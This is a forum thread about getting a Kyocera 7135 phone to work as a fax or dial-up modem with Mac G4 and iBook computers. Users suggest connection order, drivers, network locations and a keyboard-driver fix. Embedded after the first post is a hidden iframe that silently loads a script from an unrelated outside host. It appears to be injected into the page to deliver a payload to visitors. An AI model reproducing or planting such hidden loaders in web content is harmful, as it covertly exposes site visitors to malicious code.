my G4 and 7135

Is there anyone who can help me out with the capabilities of the 7135 and macintosh G4. I got my 6035 to work but I am having trouble faxing with the 7135. Any help?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

what fax software are you using?
I (and other mac users who have posted to this board) have had luck in the past fiddling with the order in which you do various things, or undoing/repeaing one of these:
- power up the phone & launch the fax/modem app on the phone
- connect the usb cable to the Mac
- boot the Mac

I've yet to find method to the madness (and it's possible that it's random), but some combination of the above usually work. Same with getting "internet connect" to recognize the 7135 as a device.

i had read that i would have a problem using my phone as a modem with my ibook (dual usb), but everything has worked pretty flawlessly for me...
i definitely dont have to boot the mac with the phone connected...
i generally connect my phone via usb data cable to my already running ibook
and then start the fax/modem app on the phone...
the first time i did so (after installing the drivers) everything worked fine...

i have created a separate network "location" that only uses the phone to connect...

i have only tried this to connect to EN to the internet, but it works for me...

does that make sense?
have you installed the drivers?
good luck!

Using my 7135 as a modem for my MAc laptop.

Is it possible to use my wireless modem on my 7135 to surf the web on my MAC Laptop? If yes.. what do I need software wise and what steps to I follow to make this happen? Thanks in advance!

Chris

A quick search of this board should turn up Paul Jay Lucas' website with instructions on using the Kyocera 7135 as a modem with Mac OS X (http://homepage.mac.com/pauljlucas/p...zon.html#modem)

Mark.

I'm getting connected but can't navigate to any pages.

I'm getting connected but can't navigate to any pages. I'm sooo close!
I have a PB G4 and a Dell Latitude. The Dell worked after adding the DNS loaction but it didn't help with the PB. This has been a long process for me.
Any help would be great.

This sounds like the keyboard conflict problem (a known issue). Do you have a portable keyboard for your 7135?? If you do, disable the keyboard driver. Then try connecting and surfing again.

Most likely that's your problem then. Let us all know how it goes.
